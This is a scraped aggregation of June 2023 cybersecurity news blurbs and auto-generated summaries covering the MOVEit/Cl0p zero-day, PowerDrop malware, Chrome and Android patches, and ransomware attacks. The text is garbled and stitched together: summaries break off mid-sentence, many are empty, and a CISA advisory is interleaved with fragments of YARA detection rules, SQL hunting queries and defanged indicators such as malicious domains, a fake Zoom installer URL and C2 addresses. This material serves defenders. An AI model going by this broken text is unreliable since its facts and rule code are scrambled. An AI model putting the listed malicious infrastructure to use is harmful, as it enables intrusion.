Includes understanding what was compromised, how deep the attackers are in the system, whether the act is a single, double or triple ransomware, if the attack was financially motivated or if it was a political or personal attack, etc.A few months later, the FBI reported they had attacked prominent ransomware group REvil: The attack garnered a response from the Conti group, which reflected their ideological motives: Ransomware Vaccinations Managing a ransomware event is similar to managing a hostage situation. The technological track includes forensic, investigation, containment, remediation and recovery, as well as professional dialogue.For example, how deep the attackers are in the system, how much data was exfiltrated, etc. The business track covers business continuity plans and media and PR. "A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop, that was employed in attacks aimed at organizations in the U.S. aerospace sector. The PowerShell-based malware uses advanced techniques to […]
The post New PowerDrop malware targets U.S. aerospace defense industry appeared first on Security Affairs.
"Autosummary:
“It highlights the importance of having dedicated 24/7 cybersecurity teams within any operational landscape,” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, PowerDrop) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Additional challenges identified in the report include third-party/vendor security management, network security, application security, endpoint security, rapid IT changes, business growth and expansion of hybrid work models, and an inadequate focus on cyber risk management. A truly global organization with a driving belief in bringing diversity, equity and inclusion to the modern cybersecurity workforce, EC-Council maintains 11 offices in the U.S., the UK, India, Malaysia, Singapore, and Indonesia. "A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them. About the 0mega ransomware operation 0mega (spelled with a zero) is a relative newcomer to the ransomware/extortion business. Evidence of its activities were first spotted roughly a year ago, when one victim – a … More
The post 0mega ransomware gang changes tactics appeared first on Help Net Security.
"Autosummary:
The attackers first compromised one of the company’s Microsoft Global admin service accounts that did not have multi-factor authentication enabled, then used it to create a new Microsoft AD user called 0mega and added various permissions to it (Global Administrator, SharePoint Administrator, Exchange Administrator, Teams Administrator). "SAIC launched Trust Resilience, a holistic approach to support government agencies adopting the mandated zero trust architecture. “Trust Resilience builds security into IT modernization, delivering protection and compliance of mission-critical resources no matter where organizations are on their technology modernization journey,” said Shawn Kingsberry, VP, Cyber Solutions at SAIC. “It also delivers well-defined metrics while aligning to all major federal government cybersecurity executive orders and the White House 2023 National Cybersecurity Strategy.” SAIC’s offering enables … More
The post SAIC Trust Resilience boosts zero trust strategy plans for government agencies appeared first on Help Net Security.
"Autosummary:
“Despite the hype surrounding Zero Trust, Government agencies are telling IDC they continue to struggle in prioritizing security modernization efforts outlined in Executive Order 14028,” said Aaron Walker, IDC Government Insights research manager, Government Trust, Security and Resiliency Strategies. "Immersive Labs and Accenture are working together to launch the Cyber Million program that aims to solve the cybersecurity talent deficit by increasing access to one million entry-level cybersecurity operations jobs over the next decade. The beta version of the program will be powered by the Immersive Labs platform with Accenture Security serving as the first foundational partner. The program is now available to other organizations seeking to make cybersecurity operations roles available on the … More
The post Immersive Labs and Accenture join forces to address the cybersecurity talent deficit appeared first on Help Net Security.
"Autosummary:
“Cybersecurity talent is everywhere, and it can be developed if those eager to learn are given the opportunity, whether or not they come from a technical background,” said Robert Boyce, Global Lead of Cyber Resilience, Accenture. "June 2023 security update for Android released by Google fixes about fifty flaws, including an Arm Mali GPU bug exploited by surveillance firms in their spyware. The June 2023 Android Security Bulletin provides details about the fix for more than fifty vulnerabilities affecting Android devices. Security updates released this month also addressed a vulnerability, tracked […]
The post June 2023 Security Update for Android fixed Arm Mali GPU bug used by spyware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, surveillance, spyware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
CurseForge: Dungeons Arise Sky Villages Better MC modpack series Fabuously Optimized (Found to not be compromised) Dungeonz Skyblock Core Vault Integrations AutoBroadcast Museum Curator Advanced Vault Integrations Bug fix Create Infernal Expansion Plus - Mod removed from CurseForge Bukkit: Display Entity Editor HavenElytra The Nexus Event Custom Entity Editor Simple Harvesting MCBounties Easy Custom Foods Anti Command Spam Bungeecord Support Ultimate Leveling Anti Redstone Crash Hydration Fragment Permission Plugin No VPNS Ultimate Titles Animations Gradient RGB Floating Damage Affected players include those who downloaded mods or plugins from CurseForge and dev.bukkit.org in the past three weeks, but the extent of the infection is yet to be fully appreciated. "Autosummary:
"Clop ransomware group claims to have hacked hundreds of companies globally by exploiting MOVEit Transfer vulnerability. The Clop ransomware group may have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer software. MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files using SFTP, SCP, and […]
The post Clop ransomware gang claims the hack of hundreds of victims exploiting MOVEit Transfer bug appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Clop ransomware group) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Categories: Threat Intelligence Tags: facebook Tags: posts Tags: google Tags: cloud run Clickbait posts on Facebook can lead to malicious websites. In this campaign, crooks are redirecting Facebook victims to scam pages hosted on Google"s infrastructure. |
The post Facebook clickbait leads to money scam for users appeared first on Malwarebytes Labs.
"Autosummary:
Indicators of Compromise Cloaking domains trendingentertainers[.]com trendingfilmreviews[.]com trendingshowbiz[.]com trendingtvshows[.]com usunveiled[.]net viralcelebrityzone[.]com viralfamezone[.]com virallaughtrack[.]com viralstargossip[.]com viralfunnylaugh[.]com Cloaking hosting 194.38.23[.]88 194.38.23[.]18 194.38.23[.]58 194.38.23[.]30 Google Cloud Run URLs (partial list here). Now, if you happen to click on a Facebook post as a real human (not a bot or using a VPN), you will get something entirely different, as the cloaking domains will perform a 302 redirect. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Bitwarden – Password security you can trust. "Autosummary:
"The URLs from the texts lead to fake branded payment pages that ask for personal details, such as name, address, and credit card information," Group-IB said. "The BBC and British Airways were both impacted by the data breach suffered by the payroll provider Zellis. As a result of the cyber attack on the payroll provider Zellis, the personal data of employees at the BBC and British Airways has been compromised and exposed. “Zellis, a payroll company based in the UK, is […]
The post British Airways, BBC and Boots were impacted the by Zellis data breach appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, MOVEit) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “Zellis, a payroll company based in the UK, is understood to have been impacted by a cyber security attack targeting file transfer company MOVEit, with British Airways among the firms impacted” reported The Mirror. "Autosummary:
This initial contact may present itself as an attempt to solicit response to an inquiry related to foreign policy, conduct a survey, request an interview, ask the recipient for a resume or to review a document, or offer payment for authoring a research paper. "Autosummary:
"Autosummary:
"Researchers from security firm Uptycs reported that threat actors linked to the Cyclops ransomware are offering a Go-based information stealer. The Cyclops group has developed multi-platform ransomware that can infect Windows, Linux, and macOS systems. In an unprecedented move, the group is also offering a separate information-stealer malware that can be used to steal sensitive data from infected […]
The post Cyclops Ransomware group offers a multiplatform Info Stealer appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Cyclops ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven"t yet fixed" - Google CVE-2023-3079 has been assessed to be a high-severity issue and it was discovered by Google"s researcher Clément Lecigne on June 1, 2023, and is a type confusion in V8, Chrome"s JavaScript engine tasked with executing code within the browser. "Verizon Business today released the results of its 16th annual Data Breach Investigations Report (2023 DBIR), which analyzed 16,312 security incidents and 5,199 breaches. Chief among its findings is the soaring cost of ransomware – malicious software (malware) that encrypts an organization’s data and extorts large sums of money to restore access. Cost per ransomware rises The median cost per ransomware more than doubled over the past two years to $26,000, with 95% of incidents … More
The post Verizon 2023 Data Breach Investigations Report: 74% of breaches involve human element appeared first on Help Net Security.
"Autosummary:
BEC on the rise Like ransomware, social engineering is a lucrative tactic for cybercriminals, especially given the rise of those techniques being used to impersonate enterprise employees for financial gain, an attack known as Business Email Compromise (BEC). "Google released security updates to address a high-severity zero-day flaw in the Chrome web browser that it actively exploited in the wild. Google released security updates to address a high-severity vulnerability, tracked as CVE-2023-3079, in its Chrome web browser. The vulnerability is a type confusion issue that resides in the V8 JavaScript engine. The IT […]
The post Google fixed the third Chrome zero-day of 2023 appeared first on Security Affairs.
"Autosummary:
"Autosummary:
The new security patch level 2023-06-05 integrates a patch for CVE-2022-22706, a high-severity flaw in the Mali GPU kernel driver from Arm that Google’s Threat Analysis Group (TAG) believes it may have been used in a spyware campaign targeting Samsung phones. "Autosummary:
Executing the decrypted command (Adlumin) Next, PowerDrop sends the results of the command execution back to the C2 server, and if they are too large, it splits them into 128-byte chunks transmitted in a stream of multiple messages. "Autosummary:
Targets of the campaign include Coinbase, Bybit, KuCoin, Huobi, and Binance users primarily located in Brazil, Algeria, Turkey, Vietnam, Indonesia, India, Egypt, and Mexico. "Categories: Exploits and vulnerabilities Categories: News Categories: Ransomware Tags: Progress Tags: MOVEit Tags: Transfer Tags: CVE-2023-34362 Tags: BBC Tags: Zellis Tags: BA The first victims of the ongoing attacks on vulnerable MOVEit Transfer instances are coming forward. The Cl0p ransomware gang claims it is behind the attacks. |
The post Cl0p ransomware gang claims first victims of the MOVEit vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer"s database.Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements.MOVEit and blocks five malicious IP addresses—138.197.152.201, 209.97.137.33, 5.252.191.0/24, 148.113.152.144, 89.39.105.108—that were found to be looking for vulnerable systems. "Autosummary:
The new security patch level 2023-06-05 integrates a patch for CVE-2022-22706, a high-severity flaw in the Mali GPU kernel driver from Arm that Google’s Threat Analysis Group (TAG) believes it may have been used in a spyware campaign targeting Samsung phones. "Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from CL0P ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known CL0P ransomware IOCs and TTPs identified through FBI investigations as recently as June 2023.
According to open source information, beginning on May 27, 2023, CL0P Ransomware Gang, also known as TA505, began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) in Progress Software"s managed file transfer (MFT) solution known as MOVEit Transfer. Internet-facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from underlying MOVEit Transfer databases. In similar spates of activity, TA505 conduct "
Autosummary:
RESOURCES REFERENCE [1] Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft | Mandiant [2] MOVEit Transfer Critical Vulnerability (May 2023) - Progress Community [3] MOVEit Transfer Critical Vulnerability CVE-2023-34362 Rapid Response (huntress.com) REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with CL0P group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.Headers[\"X-siLock-Comment\"]" $a3 = "Delete FROM users WHERE RealName="Health Check Service"" $a4 = "set[\"Username\"]" $a5 = "INSERT INTO users (Username, LoginName, InstID, Permission, RealName" $a6 = "Encryption. In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud)."https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/" reference3 = "https://gist.github.com/JohnHammond/44ce8556f798b7f6a7574148b679c643" verdict = "dangerous" mitre = "T1505.003" platform = "windows" search_context = "filesystem" strings: $a1 = "MOVEit.DMZ" $a2 = "Request.This MOVEit Transfer critical vulnerability exploit impacts the following versions of the software [2]: MOVEit Transfer 2023.0.0 MOVEit Transfer 2022.1.x MOVEit Transfer 2022.0.x MOVEit Transfer 2021.1.x MOVEit Transfer 2021.0.x MOVEit Transfer 2020.1.x MOVEit Transfer 2020.0.x Due to the speed and ease TA505 has exploited this vulnerability, and based on their past campaigns, FBI and CISA expect to see widespread exploitation of unpatched software services in both private and public networks. TA505 has operated: A RaaS and has acted as an affiliate of other RaaS operations, As an initial access broker (IAB), selling access to compromised corporate networks, As a customer of other IABs, And as a large botnet operator specializing in financial fraud and phishing attacks.You can contact us using the following contact information: unlock@rsv-box[.]com and unlock@support-mult[.]com CL0P’s toolkit contains several malware types to collect information, including the following: FlawedAmmyy/FlawedGrace remote access trojan (RAT) collects information and attempts to communicate with the Command and Control (C2) server to enable the download of additional malware components [T1071], [T1105].Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.Email Malicious Domain http://hiperfdhaus[.]com http://jirostrogud[.]com http://qweastradoc[.]com http://qweastradoc[.]com/gate.php http://connectzoomdownload[.]com/download/ZoomInstaller.exe https://connectzoomdownload[.]com/download/ZoomInstaller.exe http://zoom[.]voyage/download/Zoom.exe http://guerdofest[.]com/gate.php Certificate Name Status Date Valid Thumbprint Serial Number Savas Investments PTY LTD Valid Issuer: Sectigo Public Code Signing CA R36 10/7/2022 - 10/7/2023 8DCCF6AD21A58226521 E36D7E5DBAD133331C181 00-82-D2-24-32-3E-FA-65-06-0B-64- 1F-51-FA-DF-EF-02 MOVEit Campaign Infrastructure IP Addresses May/June 2023 GoAnywhere Campaign Infrastructure IP Addresses January/February 2023 104.194.222[.]107 100.21.161[.]34 138.197.152[.]201 104.200.72[.]149 146.0.77[.]141 107.181.161[.]207 146.0.77[.]155 141.101.68[.]154 146.0.77[.]183 141.101.68[.]166 According to open source information, beginning on May 27, 2023, CL0P Ransomware Gang, also known as TA505, began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) in Progress Software"s managed file transfer (MFT) solution known as MOVEit Transfer."https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/" reference3 = "https://gist.github.com/JohnHammond/44ce8556f798b7f6a7574148b679c643" verdict = "dangerous" mitre = "T1505.003" platform = "windows" search_context = "filesystem" strings: $a1 = "human2.aspx" wide $a2 = "Delete FROM users WHERE RealName="Health Check Service"" wide $a3 = to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).The web shell authenticates incoming http requests via a hard-coded password and can run commands that will download files from the MOVEit Transfer system, extract its Azure system settings, retrieve detailed record information, and create, insert, or delete a particular user. SELECT * FROM [<database name>].[dbo].[users] WHERE Permission=30 AND Status="active" and Deleted="0" rule MOVEit_Transfer_exploit_webshell_aspx { meta: date = "2023-06-01" description = "Detects indicators of compromise in MOVEit Transfer exploitation." with password logins (e.g., service account, admin accounts, and domain admin accounts) with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. In late January 2023, the CL0P ransomware group launched a campaign using a zero-day vulnerability, now catalogued as CVE-2023-0669, to target the GoAnywhere MFT platform. Table 1. ATT&CK Techniques for Enterprise: Initial Access Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 CL0P ransomware group exploited the zero-day vulnerability CVE-2023-34362 affecting MOVEit Transfer software; begins with a SQL injection to infiltrate the MOVEit Transfer web application. "As the digital revolution changes the claims process, both carriers and customers are increasingly concerned about data privacy, according to LexisNexis Risk Solutions. More than 60% of consumers have concerns over the security of their personally identifiable information when they submit virtual claims. While carriers are worried about the actual cost of fraud, which can cost four times the value of the fraudulent transaction and impact a carrier’s reputation. “Virtual or self-service claims have been … More
The post Virtual claims raise alarms among insurance carriers and customers appeared first on Help Net Security.
"Autosummary:
Leaders are adopting a proactive, multi-layered approach that can include verifying PII, such as name, address and date of birth; using multi-factor or knowledge-based authentication methods, such as one-time passwords, multi-factor authentication or quizzes; using real-time digital risk signals, such as device and email intelligence, behavioral biometrics, link analysis or risk scoring; and using native device biometrics, consortium-based fraud scores or continuous monitoring. "Katie Boswell spent years on the front lines securing the most critical national infrastructure in energy and life sciences. Yet, earlier in her career, she was told that senior leadership was not for her if she planned on becoming a mother. Despite early gender-based criticism she persevered and now, her experience puts her in the ideal position to discuss reinforcing the security and resiliency of systems and infrastructure. She spoke with the Left to Our … More
The post Katie Boswell on AI security and women’s rise in cybersecurity appeared first on Help Net Security.
"Autosummary:
Emphasizing the need for businesses that are new to AI to define specific frameworks to their needs, industry, ecosystem, and available tools, Katie continued, “NIST, for instance, has an AI risk management framework. As the EU begins demanding greater transparency into AI models, we plan to see a demand for more in-depth SBOM management to identify vulnerabilities between components, product lines, and business units– as well as understand how specific models are trained. Security professionals must collaborate with data scientists to better understand the diverging security concerns, privacy identity, access management, and information protection. "In today’s rapidly evolving digital landscape, organizations face constant cyber threats that can compromise their sensitive data, disrupt operations, and damage their reputation. Staying informed about the latest cyberattacks and understanding effective protection methods is crucial. This list of free cybersecurity whitepapers that don’t require registration covers a wide range of common cyber risks (ransomware, DDoS attacks, social network account hijacking). It explores the possible risks that could originate from new technologies such as generative … More
The post 9 free cybersecurity whitepapers you should read appeared first on Help Net Security.
"Autosummary:
These attacks deplete network, application, or system resources, leading to issues such as network slowdowns, application crashes, and server failures. This whitepaper from Offensive Security concentrates on optimal methods for nurturing internal cybersecurity talent within your technical teams, such as IT, information security, DevOps, or engineering. "Autosummary:
"Rather than using the attackers" own C2 server to host malicious code, which may be flagged as a malicious domain, attackers hack into (using vulnerabilities or any other means at their disposal) a vulnerable, legitimate site, such as a small or medium-sized retail website, and stash their code within it," Akamai noted. "Autosummary:
"This threat actor employs tactics such as LOLBaS (living-off-the-land binaries and scripts), along with CMD-based scripts to carry out its malicious activities," the BlackBerry Research and Intelligence Team said in a report published last week. "Ever since generative AI exploded into public consciousness with the launch of ChatGPT at the end of last year, calls to regulate the technology to stop it from causing undue harm have risen to fever pitch around the world. The stakes are high — just last week, technology leaders signed an open public letter saying that if government officials get it wrong, the consequence could be the extinction of the human race.
Autosummary:
Countries make their own regulations “[When it comes to] tech issues, even though every country is free to make its own rules, in the past what we have seen is there’s been some form of harmonization between the US, EU, and most Western countries,” said Sophie Goossens, a partner at law firm Reed Smith who specializes in AI, copyright, and IP issues. Differing approaches to regulation All regulation reflects the politics, ethics, and culture of the society you’re in, said Martha Bennett, vice president and principal analyst at Forrester, noting that in the US, for instance, there’s an instinctive reluctance to regulate unless there is tremendous pressure to do so, whereas in Europe there is a much stronger culture of regulation for the common good. “If we refer back to most technological advancements, such as the internet or artificial intelligence, it’s like a double-edged sword, as you can use it for both lawful and unlawful purposes,” said Felipe Romero Moreno, a principal lecturer at the University of Hertfordshire’s Law School whose work focuses on legal issues and regulation of emerging technologies, including AI.The draft legislation includes requirements for generative AI models to reasonably mitigate against foreseeable risks to health, safety, fundamental rights, the environment, democracy, and the rule of law, with the involvement of independent experts. "Play ransomware group claims responsibility for a ransomware attack that hit Globalcaja, one of the major banks in Spain. Globalcaja is a financial institution in the autonomous community of Castilla-La Mancha, it has more than 300 offices across Spain and provides banking services to more than half a million clients. Globalcaja was the victim of […]
The post Spanish bank Globalcaja confirms Play ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Globalcaja) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"For example, when "Password" is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d." "Autosummary:
"Microsoft is attributing attacks exploiting the CVE-2023-34362 MOVEit Transfer 0-day vulnerability to Lace Tempest, known for ransomware operations & running the Clop extortion site," the Microsoft Threat Intelligence team tweeted Sunday night. "The zero-day vulnerability attackers have exploited to compromise vulnerable Progress Software’s MOVEit Transfer installations finally has an identification number: CVE-2023-34362. Based on information shared by Mandiant, Rapid7 and other security researchers, the attackers seem to have opportunistically targeted as many exposed organizations as possible, including US government agencies and banks. Microsoft is attributing the initial attacks to the Cl0p ransomware group (aka FIN11, or Lace Tempest – according to its new threat actor taxonomy). Mandiant … More
The post MOVEit Transfer zero-day was exploited by Cl0p gang (CVE-2023-34362) appeared first on Help Net Security.
"Autosummary:
“The malware authenticates incoming connections via a hard-coded password and can run commands that will download files from the MOVEit Transfer system, extract its Azure system settings, retrieve detailed record information, create and insert a particular user, or delete this same user. "Autosummary:
"Last week two eastern Idaho hospitals and their clinics were hit by a cyberattack that temporarily impacted their operations. Last week the Idaho Falls Community Hospital was hit by a cyber attack that impacted its operations. Officials at the hospital confirmed that some clinics closed due to the cyber attack and some ambulances have been […]
The post Idaho Hospitals hit by a cyberattack that impacted their operations appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Other popular apps using the SpinOk SDK and which remain available for download via Google Play are: Macaron Match (XM Studio) – 1 million downloads Macaron Boom (XM Studio) – 1 million downloads Jelly Connect (Bling Game) – 1 million downloads Tiler Master (Zhinuo Technology) – 1 million downloads Crazy Magic Ball (XM Studio) – 1 million downloads Happy 2048 (Zhinuo Technology) – 1 million downloads Mega Win Slots (Jia22) – 500,000 downloads CloudSEK reports that the collective download count for the additional SpinOK-ridden apps reaches over 30,000,000. "Autosummary:
It’s important to recognise that blaming the BBC, Boots, British Airways, IBM, or even Zellis for this data breach is a case of shooting the messenger – rather than those were the fault really lies. "KeePass addressed the CVE-2023-32784 bug that allows the extraction of the cleartext master password from the memory of the client. KeePass has addressed the CVE-2023-32784 vulnerability, which allowed the retrieval of the clear-text master password from the client’s memory. KeePass is a free and open-source software used to securely manage passwords. It functions as a […]
The post KeePass fixed the bug that allows the extraction of the cleartext master password appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, KeePass) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Microsoft attributes the recent campaign exploiting a zero-day in the MOVEit Transfer platform to the Clop ransomware gang. The Clop ransomware gang (aka Lace Tempest) is credited by Microsoft for the recent campaign that exploits a zero-day vulnerability, tracked as CVE-2023-34362, in the MOVEit Transfer platform. Microsoft is attributing attacks exploiting the CVE-2023-34362 MOVEit Transfer […]
The post Microsoft blames Clop ransomware gang for ‘MOVEit Transfer’ attacks appeared first on Security Affairs.
"Autosummary:
— Microsoft Threat Intelligence (@MsftSecIntel) June 5, 2023 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, clop ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"I want to tell you right away that the military, children"s hospitals, GOV etc like this we no to attack, and their data was erased," Clop said in their email to BleepingComputer. "Autosummary:
Python package: Get "triangle_check" from PyPI using the following command: python -m pip install triangle_check Alternatively, the tool can be built from GitHub by running: git clone https://github.com/KasperskyLab/triangle_check cd triangle_check python -m build python -m pip install dist/triangle_check-1.0-py3-none-any.whl After that, use this command to launch the tool: python -m triangle_check path to the created backup. Creating an iOS backup through iTunes (Kaspersky) macOS: Connect your device to the computer and, if needed, confirm that you trust the computer. When launched and pointed to the iOS backup path, the triangle_check tool will output one of the following scan results: DETECTED : It means that the "Operation Triangulation" malware has infected the device beyond doubt. "Categories: Business Tags: globalcaja Tags: play ransomware Tags: compromise Tags: data Tags: leak Tags: ransom Tags: bank Tags: banking Tags: Spain Tags: Spanish A large Spanish bank, Globalcaja, has fallen victim to the Play ransomware gang. |
The post Play ransomware gang compromises Spanish bank, threatens to leak files appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.From the outset, in #Globalcaja we activated the security protocol created for this purpose, which led us, out of prudence, to disable some office posts, temporarily limiting the performance of some operations. El mismo no ha afectado al transaccional de la entidad (ni las cuentas ni los acuerdos de los clientes se… pic.twitter.com/LeQdNN8r1i — Globalcaja (@SomosGlobalcaja) June 2, 2023 Yesterday, we registered a cyber incident, consisting of a computer attack on some local computers through a type #ransomware virus. "Categories: Threat Intelligence In total, 26 separate ransomware-as-a-service gangs contributed to the onslaught on education. |
The post The 2023 State of Ransomware in Education: 84% increase in attacks over 6-month period appeared first on Malwarebytes Labs.
"Autosummary:
USA education ransomware attacks by gang, June 2022-May 2023 Global education ransomware attacks by gang, June 2022-May 2023 Looking Ahead To recap, our key findings include: A significant increase in attacks : The education sector experienced a steep rise in ransomware attacks, with a 84% increase observed over a 6-month period. Distribution of Vice Society attacks vs other ransomware gangs, June 2022-May 2023 Further findings from the data show that, while ransomware attacks against education are a global phenomenon, the USA (with 56% of known attacks) and the UK (with 15%) were hit the most frequently attacked countries between June 2022 and May 2023. Known attacks on education by country, June 2022-May 2023 The United Kingdom followed distantly with 28 known attacks, while other countries like Canada, Germany, Brazil, and others also fell prey to these cybercriminals. "Categories: Personal It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun. |
The post 5 unusual cybersecurity tips that actually work appeared first on Malwarebytes Labs.
"Autosummary:
Posted: June 5, 2023 by It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.Stop thinking you"re special Everyone is a star in their own story, so when we unexpectedly get a message from a lonely young Russian lady who"s recently moved to our town, a Nigerian Prince promises us riches, "Keanu Reeves" follows us on Instagram, or we stumble upon the crypto-opportunity of a lifetime, our exceptionalism can kick in. So, you’re on top of your software updates, you use a password manager, you’ve enabled two-factor authentication wherever you can, you’ve got BrowserGuard installed, and you’re running Malwarebytes Premium. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MOVEit Transfer zero-day attacks: The latest info Progress Software has updated the security advisory and confirmed that the vulnerability (still without a CVE number) is a SQL injection vulnerability in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer’s database. Penetration tester develops AWS-based automated cracking rig Building a custom cracking … More
The post Week in review: MOVEit Transfer critical zero-day vulnerability, Kali Linux 2023.2 released appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: May 2023 Here’s a look at the most interesting products from the past month, featuring releases from: Aqua Security, Axiado, Bitwarden, Cloudflare, ComplyAdvantage, Dashlane, Delinea, Enzoic, Feedzai, Immersive Labs, Intruder, Nebulon, NETSCOUT, Neurotechnology, Nozomi Networks, OpenVPN, Private AI, Radware, Satori, Trua, Vanta, Veriff, and Veza. New infosec products of the week: June 2, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Bitdefender, ConnectSecure, CYTRACOM, Permit.io, and PingSafe. "Autosummary:
Nevertheless, the method of exploitation bears a remarkable resemblance to previous instances, including the zero-day exploitation of Accellion FTA servers in December 2020 and the mass exploitation of a GoAnywhere MFT zero-day in January 2023. "Autosummary:
"In fact, they"re nearly identical, with 98% similarities in functions, 99.5% similarities in blocks, and 98.9% similarities in jumps based on BinDiff, a comparison tool for binary files," Trend Micro researchers noted. "Autosummary:
Additional challenges identified in the report include third-party/vendor security management, network security, application security, endpoint security, rapid IT changes, business growth and expansion of hybrid work models, and an inadequate focus on cyber risk management. A truly global organization with a driving belief in bringing diversity, equity and inclusion to the modern cybersecurity workforce, EC-Council maintains 11 offices in the U.S., the UK, India, Malaysia, Singapore, and Indonesia. "Experts noticed that the new Linux ransomware BlackSuit has significant similarities with the Royal ransomware family. Royal ransomware is one of the most notable ransomware families of 2022, it made the headlines in early May 2023 with the attack against the IT systems in Dallas, Texas. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has […]
The post New Linux Ransomware BlackSuit is similar to Royal ransomware appeared first on Security Affairs.
"Autosummary:
The ransomware encrypts the network shares, that are found on the local network and the local drives, with the AES algorithm In early May, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations, tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family. "Autosummary:
